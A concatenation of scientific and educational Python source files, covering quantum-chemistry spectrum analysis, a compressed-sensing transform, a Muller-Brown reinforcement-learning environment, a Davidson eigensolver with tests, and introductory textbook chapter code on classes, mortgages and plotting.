xFilename = 'h2o_x_RealTime_Dipole.csv'
yFilename = 'h2o_y_RealTime_Dipole.csv'
zFilename = 'h2o_z_RealTime_Dipole.csv'
kick = 0.0001 # depends on system
damping = 150.0 # anywhere between 50-250 usually works well
doCS = False # if True, do compressed sensing technique
w, Sxx = cqRealTime(xFilename,'x',kick,damping,cs=doCS)
w, Syy = cqRealTime(yFilename,'y',kick,damping,cs=doCS)
w, Szz = cqRealTime(zFilename,'z',kick,damping,cs=doCS)
if doCS == True:
plt.plot(w,abs(Sxx+Syy+Szz)/np.linalg.norm(Sxx+Syy+Szz),label='S')
plt.ylim(0.0,0.01) # y range
if doCS == False:
plt.plot(w,Szz+Syy+Sxx,label='S')
plt.ylim(0.0,1.0) # y range
plt.xlim(0.0,30) # X range
plt.legend()
plt.xlabel(' Energy / eV ')
plt.ylabel(' Intensity / arbitrary units ')
#plt.show()
plt.savefig('h2o_absorption.pdf')
```
#### File: jjgoings/cq_realtime/cs_sklearn.py
```python
from __future__ import division
import numpy as np
import sys
from sklearn.linear_model import OrthogonalMatchingPursuit
from sklearn.linear_model import OrthogonalMatchingPursuitCV
def CSSK(h,const=5.0,noise=0.0000001):
"""Compressed Sensing replacement of Fourier Transform on 1D array h
    * Uses scikit-learn's OrthogonalMatchingPursuit; the CVXPY solver is left commented out below *
h = sampled time signal
const = scalar multiple dimension of h, larger values give greater
resolution albeit with increased cost.
noise = scalar constant to account for numerical noise
returns:
g = fourier transform h to frequency domain using CS technique
"""
h = np.asarray(h, dtype=float)
Nt = len(h)
Nw = int(const*Nt)
t = np.arange(Nt)
w = np.arange(Nw)
#F = np.sin(2 * np.pi * np.outer(t,w) / Nw)
F = (1/np.float(Nw))*np.sin(2.0*np.pi*np.outer(t,w)/np.float(Nw))
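    # F is an overcomplete dictionary of sampled sine basis functions;
    # the OMP fit below selects a sparse set of its columns to reproduce h.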
#omp_cv = OrthogonalMatchingPursuit(n_nonzero_coefs=n_nonzero_coefs)
#omp_cv = OrthogonalMatchingPursuitCV(verbose=True,normalize=True)
omp_cv = OrthogonalMatchingPursuit(tol=noise)
omp_cv.fit(F, h)
coef = omp_cv.coef_
#idx_r, = coef.nonzero()
g = coef
### begin using cvxpy
#g = cvx.Variable(Nw)
## min |g|_1 subject to |F.g - h|_2 < noise
#objective = cvx.Minimize(cvx.norm(g,1))
#constraints = [cvx.norm(F*g - h,2) <= noise]
#prob = cvx.Problem(objective, constraints)
#prob.solve(solver='SCS',verbose=True)
#g = np.asarray(g.value)
#g = g[:,0]
### end using cvxpy
return g
if __name__ == '__main__':
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from scipy.fftpack import fftfreq, fft
t = np.arange(0,200,1.0)
h = (np.sin(2.0*t) + 2.0*np.sin(t) + 0.5*np.sin(1.5*t))
g = CSSK(h,10.0)
#g = np.imag(fft(h))
w = fftfreq(len(g),d=(t[1]-t[0]))*2.0*np.pi
plt.plot(w,abs(g))
plt.xlim(0,2.5)
plt.savefig('cs_sklearn.pdf')
``` |
{
"source": "jjgoings/gym-muller_brown",
"score": 2
} |
#### File: gym_muller_brown/envs/muller_brown_continuous.py
```python
import gym
import numpy as np
import matplotlib.pyplot as plt
from itertools import product
from gym import error, spaces, utils
from gym.utils import seeding
class MullerBrownContinuousEnv(gym.Env):
metadata = {'render.modes': ['human']}
def __init__(self):
# state space
self.x_min = -1.5
self.x_max = 1.0
self.y_min = -0.5
self.y_max = 2.0
self.observation_space = spaces.Box(low=np.array([self.x_min,self.y_min]),
high=np.array([self.x_max,self.y_max]),
dtype=float)
# action space
self.action_min = -1
self.action_max = 1
self.action_space = spaces.Box(low=self.action_min,
high=self.action_max,shape=(2,),dtype=float)
# precompute some energies for plotting PES
self.grid_points = 60
self.energies = np.empty((self.grid_points,self.grid_points))
x = np.linspace(self.x_min,self.x_max,self.grid_points)
y = np.linspace(self.y_min,self.y_max,self.grid_points)
for ix,iy in product(range(self.grid_points),range(self.grid_points)):
self.energies[ix,iy] = self.energy((x[ix],y[iy]))
self.reset()
def plotPES(self):
''' Renders the continuous Muller Brown PES (environment) '''
x = np.linspace(self.x_min,self.x_max,self.grid_points)
y = np.linspace(self.y_min,self.y_max,self.grid_points)
fig,ax = plt.subplots()
im = plt.pcolormesh(x,y,self.energies.T, cmap='GnBu_r', vmax=10,shading='nearest')
ax.set_aspect('equal')
cbar = fig.colorbar(im, ax=ax)
plt.xlabel('x')
plt.ylabel('y')
cbar.set_label('energy')
return fig
def render(self, mode='human'):
self.plotPES()
x,y = self.agent_position
plt.plot(x,y,marker='o',color='#C91A09',markersize=8)
def energy(self, state):
'''
Muller-Brown potential energy surface
Parameters:
        state : float pair (x,y) position on the surface
        Returns:
        energy : float
'''
x,y = state
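        # Standard Muller-Brown constants: the surface is a sum of four
        # anisotropic Gaussian terms with the amplitudes and centers below.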
A = [-200, -100, -170, 15]
a = [-1, -1, -6.5, 0.7]
b = [0, 0, 11, 0.6]
c = [-10, -10, -6.5, 0.7]
x0 = [1, 0, -0.5, -1]
y0 = [0, 0.5, 1.5, 1]
energy = 0.0
for k in range(len(x0)):
energy += (A[k]) *\
np.exp(a[k]*(x-x0[k])**2 +\
b[k]*(x-x0[k])*(y-y0[k]) +\
c[k]*(y-y0[k])**2)
return energy
def set_state(self, state):
self.agent_position = state
def is_off_grid(self, state):
x,y = state
if (x >= self.x_max) or (x <= self.x_min):
return True
elif (y >= self.y_max) or (y <= self.y_min):
return True
else:
return False
def step(self, action):
old_energy = self.energy(self.agent_position)
new_state = self.agent_position + 0.2*action
done = False # we don't have a pre-set endpoint
if not self.is_off_grid(new_state):
self.set_state(new_state)
new_energy = self.energy(new_state)
reward = old_energy - new_energy
return new_state, reward, done, {}
else:
reward = -1e2 # penalize off-grid moves
return self.agent_position, reward, done, {}
def reset(self):
new_position = self.observation_space.sample()
self.set_state(new_position)
return self.agent_position
if __name__ == '__main__':
env = MullerBrownContinuousEnv()
for _ in range(10):
obs,reward,_,_ = env.step(env.action_space.sample())
print(obs,reward)
env.render()
plt.pause(0.01)
plt.close()
``` |
{
"source": "jjgoings/McMurchie-Davidson",
"score": 2
} |
#### File: mmd/utils/davidson.py
```python
import numpy as np
import scipy
def davidson(A,roots,tol=1e-8):
mat_dim = A.shape[0]
sub_dim = 4*roots
V = np.eye(mat_dim,sub_dim)
converged = False
while not converged:
# subspace
S = np.dot(V.T,np.dot(A,V))
# diag subspace
E,C = scipy.linalg.eigh(S) # note already ordered if using eigh
E,C = E[:roots], C[:,:roots]
# get current approx. eigenvectors
X = np.dot(V,C)
# form residual vectors
R = np.zeros((mat_dim,roots))
Delta = np.zeros((mat_dim,roots))
unconverged = []
for j in range(roots):
R[:,j] = np.dot((A - E[j] * np.eye(mat_dim)),X[:,j])
if np.linalg.norm(R[:,j]) > tol:
unconverged.append(j)
# check convergence
if len(unconverged) < 1:
converged = True
for j in unconverged:
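            # Davidson correction: delta_i = -r_i / (A_ii - E_j), i.e. the residual
            # scaled by the inverted diagonal of the shifted matrix.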
preconditioner = np.zeros(mat_dim)
for i in range(mat_dim):
if np.abs(E[j] - A[i,i]) < 1e-4:
continue # don't let preconditioner blow up -- keep as zero
else:
preconditioner[i] = -1/(A[i,i] - E[j])
# normalize correction vectors
Delta[:,j] = preconditioner * R[:,j]
Delta[:,j] /= np.linalg.norm(Delta[:,j])
# project corrections onto orthogonal complement
q = np.dot((np.eye(mat_dim) - np.dot(V,V.T)),Delta[:,j])
norm = np.linalg.norm(q)
if (norm > 1e-4):
if (sub_dim + 1 > min(500,mat_dim//4)):
# subspace collapse
print("Subspace too big: collapsing")
print("Eigs at current: ", E)
sub_dim = roots # restart uses best guess of eigenvecs
V = X
V, _ = np.linalg.qr(V)
break
else:
V_copy = np.copy(V)
sub_dim += 1
V = np.eye(mat_dim,sub_dim)
V[:,:(sub_dim-1)] = V_copy
# add new vector to end of subspace
V[:,-1] = q/norm
if converged:
return E, X
```
#### File: McMurchie-Davidson/tests/test019.py
```python
import numpy as np
from mmd.molecule import Molecule
from mmd.postscf import PostSCF
def test_cis():
water = """
0 1
O 0.000000 -0.075791844 0.000000
H 0.866811829 0.601435779 0.000000
H -0.866811829 0.601435779 0.000000
"""
# init molecule and build integrals
mol = Molecule(geometry=water,basis='3-21G')
# do the SCF
mol.RHF()
# now do FCI
PostSCF(mol).CIS()
# G16 reference UCIS excitation energies (full; no FC, 50-50, nosym)
# note I have manually expanded triplets in G16 to the full degeneracy
# because at this moment we don't handle spin conserved excitations
'''
#p cis(nstate=40,full) uhf/3-21G int=acc2e=14 nosymm
water
0 1
O 0.000000 -0.075791844 0.000000
H 0.866811829 0.601435779 0.000000
H -0.866811829 0.601435779 0.000000
'''
gau_ref = [6.5822,6.5822,6.5822,7.7597,7.8156,7.8156,7.8156,8.4377,8.4377, \
8.4377, 9.0903,9.0903,9.0903,9.3334,10.5493]
assert np.allclose(np.asarray(gau_ref),mol.cis_omega[:15])
```
#### File: McMurchie-Davidson/tests/test021.py
```python
import numpy as np
from mmd.utils.davidson import davidson
def test_davidson():
np.random.seed(0)
dim = 1000
A = np.diag(np.arange(dim,dtype=np.float64))
A[1:3,1:3] = 0
M = np.random.randn(dim,dim)
M += M.T
A += 1e-4*M
roots = 5
E, C = davidson(A, roots)
E_true, C_true = np.linalg.eigh(A)
E_true, C_true = E_true[:roots], C_true[:,:roots]
assert np.allclose(E, E_true)
``` |
{
"source": "JJGO/Intro-to-Computation-and-Programming",
"score": 4
} |
#### File: code/chapter 08/chapter8.py
```python
def is_smaller(x, y):
"""Assumes x and y are ints
Returns True if x is less than y and False otherwise."""
# # Code from page 150
def sqrt(x, epsilon):
"""Assumes x, epsilon floats
x >= 0
epsilon > 0
Returns result such that
x-epsilon <= result*result <= x+epsilon"""
# # Code from page 151
def copy(L1, L2):
"""Assumes L1, L2 are lists
Mutates L2 to be a copy of L1"""
while len(L2) > 0: #remove all elements from L2
L2.pop() #remove last element of L2
for e in L1: #append L1's elements to initially empty L2
L2.append(e)
# # Code to test copy (not in book)
# L1 = [1,2,3]
# L2 = [4,5,6]
# copy(L1, L2)
# print(L2)
# copy(L1, L1)
# print(L1)
# # Code from page 152
def is_prime(x):
"""Assumes x is a nonnegative int
Returns True if x is prime; False otherwise"""
if x <= 2:
return False
for i in range(2, x):
if x%i == 0:
return False
return True
# # Code from page 153
def abs(x):
"""Assumes x is an int
Returns x if x>=0 and –x otherwise"""
if x < -1:
return -x
else:
return x
# # Figure 8-3 from page page 161
def is_pal(x):
"""Assumes x is a list
Returns True if the list is a palindrome; False otherwise"""
temp = x
temp.reverse
return temp == x
def silly(n):
"""Assumes n is an int > 0
Gets n inputs from user
Prints 'Yes' if the sequence of inputs forms a palindrome;
'No' otherwise"""
for i in range(n):
result = []
elem = input('Enter element: ')
result.append(elem)
if is_pal(result):
print('Yes')
else:
print('No')
# # Code from page 162
# silly(2)
# # Code from page 163
def silly(n):
"""Assumes n is an int > 0
Gets n inputs from user
Prints 'Yes' if the sequence of inputs forms a palindrome;
'No' otherwise"""
result = []
for i in range(n):
elem = input('Enter element: ')
result.append(elem)
print(result)
if is_pal(result):
print('Yes')
else:
print('No')
# silly(2)
# # Code from page 164
# def is_pal(x):
# """Assumes x is a list
# Returns True if the list is a palindrome; False otherwise"""
# temp = x[:]
# temp.reverse()
# return temp == x
# def silly(n):
# """Assumes n is an int > 0
# Gets n inputs from user
# Prints 'Yes' if the sequence of inputs forms a palindrome;
# 'No' otherwise"""
# result = []
# for i in range(n):
# elem = input('Enter element: ')
# result.append(elem)
# print(result)
# if is_pal(result):
# print('Yes')
# else:
# print('No')
# silly(2)
```
#### File: code/chapter 10/chapter10.py
```python
class Toy(object):
def __init__(self):
self._elems = []
def add(self, new_elems):
"""new_elems is a list"""
self._elems += new_elems
def size(self):
return len(self._elems)
# print(type(Toy))
# print(type(Toy.__init__), type(Toy.add), type(Toy.size))
# # Code from page 180
# t1 = Toy()
# print(type(t1))
# print(type(t1.add))
# t2 = Toy()
# print(t1 is t2) #test for object identity
# # Code from page 181
# t1 = Toy()
# t2 = Toy()
# t1.add([3, 4])
# t2.add([4])
# print(t1.size() + t2.size())
# # Figure 10-1 from page 182
class Int_set(object):
"""An Int_set is a set of integers"""
#Information about the implementation (not the abstraction):
#Value of a set is represented by a list of ints, self._vals.
#Each int in a set occurs in self._vals exactly once.
def __init__(self):
"""Create an empty set of integers"""
self._vals = []
def insert(self, e):
"""Assumes e is an integer and inserts e into self"""
if e not in self._vals:
self._vals.append(e)
def member(self, e):
"""Assumes e is an integer
Returns True if e is in self, and False otherwise"""
return e in self._vals
def remove(self, e):
"""Assumes e is an integer and removes e from self
Raises ValueError if e is not in self"""
try:
self._vals.remove(e)
except:
raise ValueError(str(e) + ' not found')
def get_members(self):
"""Returns a list containing the elements of self._
Nothing can be assumed about the order of the elements"""
return self._vals[:]
def union(self, other):
"""other is an Int_set
        mutates self so that it contains exactly the elements in self
plus the elements in other."""
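        # One possible approach (the text leaves this as a finger exercise):
        # for e in other.get_members():
        #     self.insert(e)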
def __str__(self):
"""Returns a string representation of self"""
if self._vals == []:
return '{}'
self._vals.sort()
result = ''
for e in self._vals:
result = result + str(e) + ','
return f'{{{result[:-1]}}}'
# # Code from page 183
# s = Int_set()
# s.insert(3)
# print(s.member(3))
# # Code from page 184
# s = Int_set()
# s.insert(3)
# s.insert(4)
# print(str(s))
# print('The value of s is', s)
# # Header for finger exercise on page 184
def union(self, other):
"""other is an Int_set
    mutates self so that it contains exactly the elements in self
plus the elements in other."""
# # Figure 10-2 on page 185
class Toy(object):
def __init__(self):
self._elems = []
def add(self, new_elems):
"""new_elems is a list"""
self._elems += new_elems
def __len__(self):
return len(self._elems)
def __add__(self, other):
new_toy = Toy()
new_toy._elems = self._elems + other._elems
return new_toy
def __eq__(self, other):
return self._elems == other._elems
def __str__(self):
return str(self._elems)
def __hash__(self):
return id(self)
# t1 = Toy()
# t2 = Toy()
# t1.add([1, 2])
# t2.add([3, 4])
# t3 = t1 + t2
# print('The value of t3 is', t3)
# print('The length of t3 is', len(t3))
# d = {t1: 'A', t2: 'B'}
# print('The value', d[t1], 'is associated with the key t1 in d.')
# # Import used for class Person
import datetime
# # Figure 10-3 from page 189
class Person(object):
def __init__(self, name):
"""Assumes name a string. Create a person"""
self._name = name
try:
last_blank = name.rindex(' ')
self._last_name = name[last_blank+1:]
except:
self._last_name = name
self.birthday = None
def get_name(self):
"""Returns self's full name"""
return self._name
def get_last_name(self):
"""Returns self's last name"""
return self._last_name
def set_birthday(self, birthdate):
"""Assumes birthdate is of type datetime.date
Sets self's birthday to birthdate"""
self._birthday = birthdate
def get_age(self):
"""Returns self's current age in days"""
if self._birthday == None:
raise ValueError
return (datetime.date.today() - self._birthday).days
def __lt__(self, other):
"""Assume other a Person
Returns True if self precedes other in alphabetical
order, and False otherwise. Comparison is based on last
names, but if these are the same full names are
compared."""
if self._last_name == other._last_name:
return self._name < other._name
return self._last_name < other._last_name
def __str__(self):
"""Returns self's name"""
return self._name
# # Code from page 188
# me = Person('<NAME>')
# him = Person('<NAME>')
# her = Person('Madonna')
# print(him.get_last_name())
# him.set_birthday(datetime.date(1961, 8, 4))
# her.set_birthday(datetime.date(1958, 8, 16))
# print(him.get_name(), 'is', him.get_age(), 'days old')
# # Code from page 190
# p_list = [me, him, her]
# for p in p_list:
# print(p)
# p_list.sort()
# for p in p_list:
# print(p)
# # Figure 10-4 from page 192
class MIT_person(Person):
_next_id_num = 0 #identification number
def __init__(self, name):
super().__init__(name)
self._id_num = MIT_person._next_id_num
MIT_person._next_id_num += 1
def get_id_num(self):
return self._id_num
def __lt__(self, other):
return self._id_num < other._id_num
# # Code from page 192
# p1 = MIT_person('<NAME>')
# print(str(p1) + '\'s id number is ' + str(p1.get_id_num()))
# # Code from page 193
p1 = MIT_person('<NAME>')
p2 = MIT_person('<NAME>')
p3 = MIT_person('<NAME>')
p4 = Person('<NAME>')
# print('p1 < p2 =', p1 < p2)
# print('p3 < p2 =', p3 < p2)
# print('p4 < p1 =', p4 < p1)
# print('p1 < p4 =', p1 < p4)
# Finger exercise from page 194
class Politician(Person):
""" A politician is a person that can belong to a political party"""
def __init__(self, name, party = None):
"""name and party are strings"""
def get_party(self):
"""returns the party to which self belongs"""
    def might_agree(self, other):
        """returns True if self and other belong to the same party
        or at least one of them does not belong to a party"""
# # Figure 10-5 from page 194
class Student(MIT_person):
pass
class UG(Student):
def __init__(self, name, class_year):
super().__init__(name)
self._year = class_year
def get_class(self):
return self._year
class Grad(Student):
pass
# # Code from page 195
# p5 = Grad('<NAME>')
# p6 = UG('<NAME>', 1984)
# print(p5, 'is a graduate student is', type(p5) == Grad)
# print(p5, 'is an undergraduate student is', type(p5) == UG)
# # Code from page 195 -- Should be added to class MIT_Person
def is_student(self):
return isinstance(self, Student)
# print(p5, 'is a student is', p5.is_student())
# print(p6, 'is a student is', p6.is_student())
# print(p3, 'is a student is', p3.is_student())
# # Code from page 196
class Transfer_student(Student):
def __init__(self, name, from_school):
MIT_person.__init__(self, name)
self._from_school = from_school
def get_old_school(self):
return self._from_school
# # Figure 10-6 from page 198
class Grades(object):
def __init__(self):
"""Create empty grade book"""
self._students = []
self._grades = {}
self._is_sorted = True
def add_student(self, student):
"""Assumes: student is of type Student
Add student to the grade book"""
if student in self._students:
raise ValueError('Duplicate student')
self._students.append(student)
self._grades[student.get_id_num()] = []
self._is_sorted = False
def add_grade(self, student, grade):
"""Assumes: grade is a float
Add grade to the list of grades for student"""
try:
self._grades[student.get_id_num()].append(grade)
except:
raise ValueError('Student not in mapping')
def get_grades(self, student):
"""Return a list of grades for student"""
try:
return self._grades[student.get_id_num()][:]
except:
raise ValueError('Student not in mapping')
def get_students(self):
"""Return a sorted list of the students in the grade book"""
if not self._is_sorted:
self._students.sort()
self._is_sorted = True
return self._students[:]
# def get_students(self): #new version from later in chapter
# """Return the students in the grade book one at a time
# in alphabetical order"""
# if not self._is_sorted:
# self._students.sort()
# self._is_sorted = True
# for s in self._students:
# yield s
# # Code from page 197
# course = Grades()
# course.add_student(Grad('Bernie'))
# all_students = course.get_students()
# all_students.append(Grad('Liz'))
# # Figure 10-7 from page 199
def grade_report(course):
"""Assumes course is of type Grades"""
report = ''
for s in course.get_students():
tot = 0.0
num_grades = 0
for g in course.get_grades(s):
tot += g
num_grades += 1
try:
average = tot/num_grades
report = f"{report}\n{s}'s mean grade is {average}"
except ZeroDivisionError:
report = f"{report}\n{s} has no grades"
return report
# ug1 = UG('<NAME>', 2021)
# ug2 = UG('<NAME>', 2041)
# ug3 = UG('<NAME>', 2003)
# g1 = Grad('<NAME>')
# g2 = Grad('<NAME>')
# six_hundred = Grades()
# six_hundred.add_student(ug1)
# six_hundred.add_student(ug2)
# six_hundred.add_student(g1)
# six_hundred.add_student(g2)
# for s in six_hundred.get_students():
# six_hundred.add_grade(s, 75)
# six_hundred.add_grade(g1, 25)
# six_hundred.add_grade(g2, 100)
# six_hundred.add_student(ug3)
# print(grade_report(six_hundred))
# # Figure 10-8 from page 201
class info_hiding(object):
def __init__(self):
self.visible = 'Look at me'
self.__also_visible__ = 'Look at me too'
self.__invisible = 'Don\'t look at me directly'
def print_visible(self):
print(self.visible)
def print_invisible(self):
print(self.__invisible)
def __print_invisible(self):
print(self.__invisible)
def __print_invisible__(self):
print(self.__invisible)
# # Code from page 201
# test = info_hiding()
# print(test.visible)
# print(test.__also_visible__)
# print(test.__invisible)
# test = info_hiding()
# test.print_invisible()
# test.__print_invisible__()
# test.__print_invisible()
# # Code from page 202
class Sub_class(info_hiding):
def new_print_invisible(self):
print(self.__invisible)
# test_sub = Sub_class()
# test_sub.new_print_invisible()
# # Figure 10-9 from page 204 is embedded as a comment in code for Figure 10-7
# # Code from page 205
# book = Grades()
# book.add_student(Grad('Julie'))
# book.add_student(Grad('Lisa'))
# for s in book.get_students():
# print(s)
# # Finger exercise from page 205
def get_students_above(self, grade):
"""Return the students a mean grade > g one at a time"""
# # Figure 10-10 from page 208
def find_payment(loan, r, m):
"""Assumes: loan and r are floats, m an int
Returns the monthly payment for a mortgage of size
loan at a monthly rate of r for m months"""
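    # Standard fixed-rate annuity (amortization) formula:
    # payment = loan*r*(1+r)**m / ((1+r)**m - 1)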
return loan*((r*(1+r)**m)/((1+r)**m - 1))
class Mortgage(object):
"""Abstract class for building different kinds of mortgages"""
def __init__(self, loan, ann_rate, months):
"""Assumes: loan and ann_rate are floats, months an int
Creates a new mortgage of size loan, duration months, and
annual rate ann_rate"""
self._loan = loan
self._rate = ann_rate/12
self._months = months
self._paid = [0.0]
self._outstanding = [loan]
self._payment = find_payment(loan, self._rate, months)
self._legend = None #description of mortgage
def make_payment(self):
"""Make a payment"""
self._paid.append(self._payment)
reduction = self._payment - self._outstanding[-1]*self._rate
self._outstanding.append(self._outstanding[-1] - reduction)
def get_total_paid(self):
"""Return the total amount paid so far"""
return sum(self._paid)
def __str__(self):
return self._legend
# Figure 10-11 from page 211
class Fixed(Mortgage):
def __init__(self, loan, r, months):
Mortgage.__init__(self, loan, r, months)
self._legend = f'Fixed, {r*100:.1f}%'
class Fixed_with_pts(Mortgage):
def __init__(self, loan, r, months, pts):
Mortgage.__init__(self, loan, r, months)
self._pts = pts
self._paid = [loan*(pts/100)]
self._legend = f'Fixed, {r*100:.1f}%, {pts} points'
class Two_rate(Mortgage):
def __init__(self, loan, r, months, teaser_rate, teaser_months):
Mortgage.__init__(self, loan, teaser_rate, months)
self._teaser_months = teaser_months
self._teaser_rate = teaser_rate
self._nextRate = r/12
self._legend = (f'{100*teaser_rate:.1f}% for ' +
f'{self._teaser_months} months, then {100*r:.1f}%')
def make_payment(self):
if len(self._paid) == self._teaser_months + 1:
self._rate = self._nextRate
self._payment = find_payment(self._outstanding[-1],
self._rate,
self._months - self._teaser_months)
Mortgage.make_payment(self)
def compare_mortgages(amt, years, fixed_rate, pts, pts_rate,
var_rate1, var_rate2, var_months):
tot_months = years*12
fixed1 = Fixed(amt, fixed_rate, tot_months)
fixed2 = Fixed_with_pts(amt, pts_rate, tot_months, pts)
two_rate = Two_rate(amt, var_rate2, tot_months, var_rate1,
var_months)
morts = [fixed1, fixed2, two_rate]
for m in range(tot_months):
for mort in morts:
mort.make_payment()
for m in morts:
print(m)
print(f' Total payments = ${m.get_total_paid():,.0f}')
# # Code from page 210
# compare_mortgages(amt=200000, years=30, fixed_rate=0.035,
# pts = 2, pts_rate=0.03, var_rate1=0.03,
# var_rate2=0.05, var_months=60)
```
#### File: code/chapter 13/chapt13.py
```python
import matplotlib.pyplot as plt
import numpy as np
#set line width
plt.rcParams['lines.linewidth'] = 4
#set font size for titles
plt.rcParams['axes.titlesize'] = 20
#set font size for labels on axes
plt.rcParams['axes.labelsize'] = 20
#set size of numbers on x-axis
plt.rcParams['xtick.labelsize'] = 16
#set size of numbers on y-axis
plt.rcParams['ytick.labelsize'] = 16
#set size of ticks on x-axis
plt.rcParams['xtick.major.size'] = 7
#set size of ticks on y-axis
plt.rcParams['ytick.major.size'] = 7
#set size of markers, e.g., circles representing points
plt.rcParams['lines.markersize'] = 10
#set number of times marker is shown when displaying legend
plt.rcParams['legend.numpoints'] = 1
#Set size of type in legend
plt.rcParams['legend.fontsize'] = 14
# # Code from page 258
# plt.plot([1,2,3,4], [1,7,3,5]) #draw on current figure
# # Code from page 259
# plt.figure(1) #create figure 1
# plt.plot([1,2,3,4], [1,2,3,4]) #draw on figure 1
# plt.figure(2) #create figure 2
# plt.plot([1,4,2,3], [5,6,7,8]) #draw on figure 2
# plt.savefig('Figure-Addie') #save figure 2
# plt.figure(1) #go back to working on figure 1
# plt.plot([5,6,10,3]) #draw again on figure 1
# plt.savefig('Figure-Jane') #save figure 1
# # Code from page 260
# principal = 10000 #initial investment
# interest_rate = 0.05
# years = 20
# values = []
# for i in range(years + 1):
# values.append(principal)
# principal += principal*interest_rate
# plt.plot(values)
# plt.title('5% Growth, Compounded Annually')
# plt.xlabel('Years of Compounding')
# plt.ylabel('Value of Principal ($)')
# # Code from page 261
# principal = 10000 #initial investment
# interestRate = 0.05
# years = 20
# values = []
# for i in range(years + 1):
# values.append(principal)
# principal += principal*interestRate
# plt.plot(values, '-k', linewidth = 30)
# plt.title('5% Growth, Compounded Annually',
# fontsize = 'xx-large')
# plt.xlabel('Years of Compounding', fontsize = 'x-small')
# plt.ylabel('Value of Principal ($)')
# # The function find_payment is from Figure 10-10
def find_payment(loan, r, m):
"""Assumes: loan and r are floats, m an int
Returns the monthly payment for a mortgage of size
loan at a monthly rate of r for m months"""
return loan*((r*(1+r)**m)/((1+r)**m - 1))
# # Figure 13-7 from page 264
class Mortgage(object):
"""Abstract class for building different kinds of mortgages"""
def __init__(self, loan, annRate, months):
self._loan = loan
self._rate = annRate/12.0
self._months = months
self._paid = [0.0]
self._outstanding = [loan]
self._payment = find_payment(loan, self._rate, months)
self._legend = None #description of mortgage
def make_payment(self):
self._paid.append(self._payment)
reduction = self._payment - self._outstanding[-1]*self._rate
self._outstanding.append(self._outstanding[-1] - reduction)
def get_total_paid(self):
return sum(self._paid)
def __str__(self):
return self._legend
def plot_payments(self, style):
plt.plot(self._paid[1:], style, label = self._legend)
def plot_balance(self, style):
plt.plot(self._outstanding, style, label = self._legend)
def plot_tot_pd(self, style):
tot_pd = [self._paid[0]]
for i in range(1, len(self._paid)):
tot_pd.append(tot_pd[-1] + self._paid[i])
plt.plot(tot_pd, style, label = self._legend)
def plot_net(self, style):
tot_pd = [self._paid[0]]
for i in range(1, len(self._paid)):
tot_pd.append(tot_pd[-1] + self._paid[i])
equity_acquired = np.array([self._loan]*len(self._outstanding))
equity_acquired = equity_acquired-np.array(self._outstanding)
net = np.array(tot_pd) - equity_acquired
plt.plot(net, style, label = self._legend)
# # Code from page 265
# a1 = np.array([1, 2, 4])
# print('a1 =', a1)
# a2 = a1*2
# print('a2 =', a2)
# print('a1 + 3 =', a1 + 3)
# print('3 - a1 =', 3 - a1)
# print('a1 - a2 =', a1 - a2)
# print('a1*a2 =', a1*a2)
# Code from Figure 13-8 on page 267
class Fixed(Mortgage):
def __init__(self, loan, r, months):
Mortgage.__init__(self, loan, r, months)
self._legend = f'Fixed, {r*100:.1f}%'
class Fixed_with_pts(Mortgage):
def __init__(self, loan, r, months, pts):
Mortgage.__init__(self, loan, r, months)
self._pts = pts
self._paid = [loan*(pts/100)]
self._legend = f'Fixed, {r*100:.1f}%, {pts} points'
class Two_rate(Mortgage):
def __init__(self, loan, r, months, teaser_rate, teaser_months):
Mortgage.__init__(self, loan, teaser_rate, months)
self._teaser_months = teaser_months
self._teaser_rate = teaser_rate
self._nextRate = r/12
self._legend = (f'{100*teaser_rate:.1f}% for ' +
f'{self._teaser_months} months, then {100*r:.1f}%')
def make_payment(self):
if len(self._paid) == self._teaser_months + 1:
self._rate = self._nextRate
self._payment = find_payment(self._outstanding[-1],
self._rate,
self._months - self._teaser_months)
Mortgage.make_payment(self)
# Code from Figure 13-9 on page 268
def compare_mortgages(amt, years, fixed_rate, pts, pts_rate,
var_rate1, var_rate2, var_months):
tot_months = years*12
fixed1 = Fixed(amt, fixed_rate, tot_months)
fixed2 = Fixed_with_pts(amt, pts_rate, tot_months, pts)
two_rate = Two_rate(amt, var_rate2, tot_months, var_rate1, var_months)
morts = [fixed1, fixed2, two_rate]
for m in range(tot_months):
for mort in morts:
mort.make_payment()
plot_mortgages(morts, amt)
# Code from Figure 13-10 on page 269
def plot_mortgages(morts, amt):
def label_plot(figure, title, x_label, y_label):
plt.figure(figure)
plt.title(title)
plt.xlabel(x_label)
plt.ylabel(y_label)
plt.legend(loc = 'best')
styles = ['k-', 'k-.', 'k:']
#Give names to figure numbers
payments, cost, balance, net_cost = 0, 1, 2, 3
for i in range(len(morts)):
plt.figure(payments)
morts[i].plot_payments(styles[i])
plt.figure(cost)
morts[i].plot_tot_pd(styles[i])
plt.figure(balance)
morts[i].plot_balance(styles[i])
plt.figure(net_cost)
morts[i].plot_net(styles[i])
label_plot(payments, f'Monthly Payments of ${amt:,} Mortages',
'Months', 'Monthly Payments')
label_plot(cost, f'Cash Outlay of ${amt:,} Mortgages',
'Months', 'Total Payments')
label_plot(balance, f'Balance Remaining of ${amt:,} Mortages',
'Months', 'Remaining Loan Balance of $')
label_plot(net_cost, f'Net Cost of ${amt:,} Mortgages',
'Months', 'Payments - Equity $')
# # Code from page 268
# compare_mortgages(amt=200000, years=30, fixed_rate=0.07,
# pts = 3.25, pts_rate=0.05, var_rate1=0.045,
# var_rate2=0.095, var_months=48)
# # Code from Figure 13-14 on page 272
def simulation(fixed, variable):
infected = [fixed['initial_infections']]
new_infections = [fixed['initial_infections']]
total_infections = fixed['initial_infections']
for t in range(fixed['duration']):
cur_infections = infected[-1]
# remove people who are no longer contagious
if len(new_infections) > fixed['days_spreading']:
cur_infections -= new_infections[-fixed['days_spreading']-1]
# if social distancing, change number of daily contacts
if t >= variable['red_start'] and t < variable['red_end']:
daily_contacts = variable['red_daily_contacts']
else:
daily_contacts = fixed['init_contacts']
# compute number of new cases
total_contacts = cur_infections * daily_contacts
susceptible = fixed['pop'] - total_infections
risky_contacts = total_contacts * (susceptible/fixed['pop'])
newly_infected = round(risky_contacts*fixed['contagiousness'])
# update variables
new_infections.append(newly_infected)
total_infections += newly_infected
infected.append(cur_infections + newly_infected)
return infected, total_infections
# # Code from Figure 13-15 on page 273
def plot_infections(infections, total_infections, fixed):
infection_plot = plt.plot(infections, 'r', label = 'Infected')[0]
plt.xticks(fontsize = 'large')
plt.yticks(fontsize = 'large')
plt.xlabel('Days Since First Infection',fontsize = 'xx-large')
plt.ylabel('Number Currently Infected',fontsize = 'xx-large')
plt.title('Number of Infections Assuming No Vaccine\n' +
